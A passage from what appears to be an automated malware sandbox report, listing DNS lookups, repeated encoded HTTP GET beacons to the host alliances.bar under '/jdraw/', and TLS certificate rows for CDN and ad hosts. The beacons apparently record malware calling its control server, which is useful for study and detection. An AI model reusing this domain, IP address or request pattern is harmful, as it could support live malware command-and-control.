                                                        Jul 27, 2021 10:57:31.359699965 CEST8.8.8.8192.168.2.30x2a89No error (0)alliances.bar195.110.59.2A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.300312996 CEST8.8.8.8192.168.2.30xdd1aNo error (0)alliancer.bar162.255.119.245A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)www.alliancer.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:38.699054003 CEST8.8.8.8192.168.2.30x96b5No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.412241936 CEST8.8.8.8192.168.2.30xfe09No error (0)alliancer.bar162.255.119.245A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)www.alliancer.barparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:39.829297066 CEST8.8.8.8192.168.2.30xd4c2No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:53.324261904 CEST8.8.8.8192.168.2.30xe1a0No error (0)alliances.bar195.110.59.2A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • alliances.bar

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349775195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.528923988 CEST3575OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.349776195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.579535007 CEST3576OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.349809195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:31.479604959 CEST6735OUTGET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.349811195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:31.663826942 CEST6737OUTGET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.349821195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.369296074 CEST6862OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.349822195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.413059950 CEST6863OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.349824195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.492652893 CEST6864OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.349777195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.657140017 CEST3577OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.349778195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.697463989 CEST3579OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.349779195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.835757971 CEST3580OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.349780195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.898238897 CEST3581OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.349781195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.957025051 CEST3582OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.349782195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:51.417496920 CEST3681OUTGET /jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.349795195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:14.924638987 CEST6590OUTGET /jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9192.168.2.349808195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:31.403364897 CEST6735OUTGET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Jul 27, 2021 10:55:44.309129953 CEST104.20.185.68443192.168.2.349734CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:44.309911013 CEST104.20.185.68443192.168.2.349735CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:44.751471043 CEST172.67.70.134443192.168.2.349738CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Oct 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Oct 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:44.751939058 CEST172.67.70.134443192.168.2.349739CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Oct 06 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Oct 06 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:45.141944885 CEST172.67.69.19443192.168.2.349742CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Apr 21 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Apr 21 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:45.141978025 CEST172.67.69.19443192.168.2.349743CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Apr 21 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Apr 21 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jul 27, 2021 10:55:45.163145065 CEST142.250.186.70443192.168.2.349740CN=*.doubleclick.net CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Jun 28 03:33:50 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Mon Sep 20 03:33:49 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                        CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                        Jul 27, 2021 10:55:45.163212061 CEST142.250.186.70443192.168.2.349741CN=*.doubleclick.net CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Jun 28 03:33:50 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Mon Sep 20 03:33:49 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                        CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                        Jul 27, 2021 10:55:50.657478094 CEST151.101.1.44443192.168.2.349755CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                        Jul 27, 2021 10:55:50.657537937 CEST151.101.1.44443192.168.2.349753CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                        Jul 27, 2021 10:55:50.663152933 CEST151.101.1.44443192.168.2.349757CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
